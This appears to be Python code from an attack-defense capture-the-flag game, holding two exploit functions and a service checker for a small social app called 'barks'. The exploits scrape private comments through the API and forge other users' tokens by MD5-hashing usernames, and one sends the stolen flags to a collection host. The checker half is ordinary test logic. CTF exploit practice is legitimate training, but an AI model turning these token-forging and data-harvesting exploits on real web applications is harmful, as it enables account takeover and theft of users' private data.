def sploit3(hostname: str) -> list: api = Api(hostname) username = get_random_string() api.sing_up(username, get_random_string(), get_random_string(), get_random_string()) token = api.generate_token() flags = [] for page_n in range(0, 10): barks_list = api.api_get_last_barks(token, page_n) for bark in barks_list: bark_id = bark["id"] comments = api.api_comments(token, bark_id) flags += [ comment["text"] for comment in comments if comment["is_private"] and FLAG_REGEXP.match(comment["text"]) ] if not barks_list: break return flags
def sploit4(hostname: str) -> list: api = Api(hostname) username = get_random_string() api.sing_up(username, get_random_string(), get_random_string(), get_random_string()) token = api.generate_token() flags = [] tokens = [] bark_ids = [] page_n = 0 barks_list = api.api_get_last_barks(token, page_n) for bark in barks_list: bark_ids.append(bark["id"]) users_list = api.api_get_users(token, page_n) for user in users_list: for generation in generations: token = hashlib.md5( f"{user['username']}{generation}".encode()).hexdigest() r = api.api_index(token) if r: print(token) for bark_id in bark_ids: comments = api.api_comments(token, bark_id) flags += [ comment["text"] for comment in comments if comment["is_private"] and FLAG_REGEXP.match(comment["text"]) ] print(flags) requests.put("http://10.118.0.10/flags", headers={"X-Team-Token": TOKEN}, json=flags) break return flags
def check(check_request: CheckRequest) -> Verdict: api = Api(check_request.hostname) try: username = get_random_str() password = get_random_str() r = api.sing_up(username, password, get_random_str(), get_random_str()) if r.status_code == 200 and f"{api.url}/{username}/" != r.url: print(f"Found {r.url}, but wait {api.url}/{username}. Status code {r.status_code}") return Verdict.MUMBLE("can't pass registration") bark = get_random_text() r = api.add_bark(username, bark) if r.status_code == 200 and f"{api.url}/{username}/" != r.url or bark not in r.text: print(f"Found {r.url}, but wait {api.url}/{username} OR '{bark}' not in response. Status code: {r.status_code}") return Verdict.MUMBLE("can't create bark") bark_id = int(r.text.split(bark)[0].split("/get_bark/")[1][0:-3]) comment = get_random_text() r = api.comment_bark(bark_id, comment) if r.status_code == 200 and comment not in r.text: print(f"Comment {comment} not in response. Status code: {r.status_code}") return Verdict.MUMBLE("can't create comment") api.logout() new_username = get_random_str() new_password = get_random_str() r = api.sing_up(new_username, new_password, get_random_str(), get_random_str()) r = api.add_friend(username) if r.status_code == 200 and username not in r.text: print(f"Can't find {username} in friends list. Status code: {r.status_code}") return Verdict.MUMBLE("can't add friend") api.logout() r = api.login(username, password) if r.status_code == 200 and f"{api.url}/{username}/" != r.url: print(f"Found {r.url}, but wait {api.url}/{username}. Status code: {r.status_code}") return Verdict.MUMBLE("can't log in") r = api.confirm_friend(new_username) if r.status_code == 200 and username not in r.text: print(f"Friend {username} not found in friends list. Status code: {r.status_code}") return Verdict.MUMBLE("can't confirm friend") token = api.generate_token() if not token: print(f"Can't get token") return Verdict.MUMBLE("can't get token") api.logout() user_dict = api.api_index(token) if user_dict['username'] != username or user_dict['token'] != token: print(f"Fields username and token isn't correct. Found: {user_dict['username']}, {user_dict['token']}. Wait: {username}, {token}") return Verdict.MUMBLE("api user info incorrect") barks_list = api.api_barks(token, username) for user_bark in barks_list: if user_bark['text'] == bark: break else: print(f"Wait for '{bark}', but got {user_bark['text']}") return Verdict.MUMBLE("incorrect bark") comments_list = api.api_comments(token, bark_id) for user_comment in comments_list: if user_comment['text'] == comment: break else: print(f"Wait for '{comment}', but got {user_comment['text']}") return Verdict.MUMBLE("incorrect comment") user_info = api.api_user_info(token, username) if user_info['username'] != username or user_info['id'] != user_dict['id']: print(f"Incorrect user_info. Got {user_info['username']}, {user_info['id']}, but wait {username}, {user_dict['id']}") return Verdict.MUMBLE("incorrect user info") for i in range(0, 5): users_list = api.api_get_users(token, i) if [u for u in users_list if u['username'] == username and u['id'] == user_dict['id']]: break else: print(f"can't find user via api") return Verdict.MUMBLE("can't find user") for i in range(0, 5): barks_list = api.api_get_last_barks(token, i) if [b for b in barks_list if b['id'] == bark_id]: break else: print(f"can't find user via api") return Verdict.MUMBLE("can't find user") return Verdict.OK() except RequestException as e: print(f"can't connect due to {e}") return Verdict.DOWN("can't connect to host") except Exception as e: print(e) return Verdict.MUMBLE("bad proto")